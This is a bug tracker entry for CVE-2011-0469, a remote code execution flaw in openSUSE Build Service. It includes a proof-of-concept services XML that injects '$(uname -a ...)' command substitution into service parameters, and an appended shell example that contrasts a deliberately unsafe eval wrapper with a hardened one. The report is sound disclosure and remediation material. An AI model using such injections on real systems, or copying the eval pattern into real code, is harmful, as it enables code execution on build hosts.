Bug 679325 (CVE-2011-0469)

Summary: VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution
Product: [openSUSE] openSUSE.org Reporter: Matthias Weckbecker <mweckbecker>
Component: BuildService Assignee: Adrian Schröter <adrian.schroeter>
Status: RESOLVED FIXED QA Contact: Adrian Schröter <adrian.schroeter>
Severity: Major    
Priority: P2 - High CC: meissner, security-team
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   

Description Matthias Weckbecker 2011-03-14 10:50:33 UTC
Adrian, as discussed last week, the service code contains various remote code execution vulnerabilities which allow attackers to execute arbitrary code on build systems with nobody privileges.

Ludwig suggested opening a bug for the issue in order to keep it tracked.

POC:

Add the following service to your project to get access to a machine w/ internet connectivity:

 <services>
  <service name="download_url">
    <param name="protocol">ftp</param>
    <param name="host">cpan.myclash.net</param>
    <param name="path">$(uname -a; exit 0)</param>
  </service>
  <service name="verify_file">
    <param name="file">$(uname -a)</param>
    <param name="verifier">md5</param>
    <param name="checksum">645ea983242177e446d68905cb5ecda5</param>
  </service>
 </services>

Comment 1 Ludwig Nussel 2011-03-14 10:59:31 UTC
use CVE-2011-0469
Comment 2 Christian Dengler 2011-03-14 11:28:10 UTC
The first script I found this issue in is fixed now (sr 64070).

But the other services, especially with network connection, contain a higher risk.
Comment 3 Adrian Schröter 2011-03-14 11:31:33 UTC
This was only possible when using the "experimental lxc wrapper for additional security ;)". This is fixed now. I will include the fix in next 2.1 release, but I have some serious doubts that anyone else ever used the LXC wrapper (because it is quite tricky to get it working anyway).
Comment 4 Adrian Schröter 2011-03-14 11:33:19 UTC
Comment 2: The problem was not the particular service, it was buggy, but safe. The problem was the lxc wrapper script (only used on server side so far).
Comment 6 Marcus Meissner 2017-08-02 15:58:24 UTC
No official announcement on openbuildservice.org.
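
Added example, not part of the bug report and not OBS code: comments 3 and 4 attribute the issue to the LXC wrapper script, whose source is not shown on this page. Assuming, hypothetically, that such a wrapper re-parses service arguments through a shell, the block below contrasts that pattern with forwarding the argument vector unchanged, using a harmless constructed value `$(echo INJECTED)` in place of the PoC parameter. The names `run_service`, `wrap_unsafe`, `wrap_safe` and `param_ok` are illustrative.

```shell
#!/bin/sh
# Added example; every name here is hypothetical, none is from OBS.

# Stand-in for a source service script: reports the --path value it received.
run_service() {
    while [ $# -gt 0 ]; do
        case "$1" in
            --path) printf '%s\n' "$2"; return 0 ;;
        esac
        shift
    done
    return 1
}

# Assumed unsafe wrapper pattern: the arguments are flattened into one string
# and parsed again by the shell, so $(...) inside a parameter value runs.
wrap_unsafe() {
    eval "run_service $*"
}

# Hardened pattern: forward the argument vector untouched, no second parse.
wrap_safe() {
    run_service "$@"
}

# Defense in depth: allowlist for parameter values before any service runs.
# Rejects empty values and anything outside letters, digits and . _ / -
param_ok() {
    case "$1" in
        ''|*[!A-Za-z0-9._/-]*) return 1 ;;
    esac
    return 0
}

# Constructed, harmless stand-in for the <param name="path"> value in the PoC.
PARAM='$(echo INJECTED)'

printf 'unsafe wrapper passes on: %s\n' "$(wrap_unsafe --path "$PARAM")"
printf 'safe wrapper passes on:   %s\n' "$(wrap_safe --path "$PARAM")"
if param_ok "$PARAM"; then
    echo 'allowlist: accepted'
else
    echo 'allowlist: rejected'
fi
```

The allowlist in `param_ok` is one possible policy; real services that accept URLs or checksums would need their own per-parameter patterns.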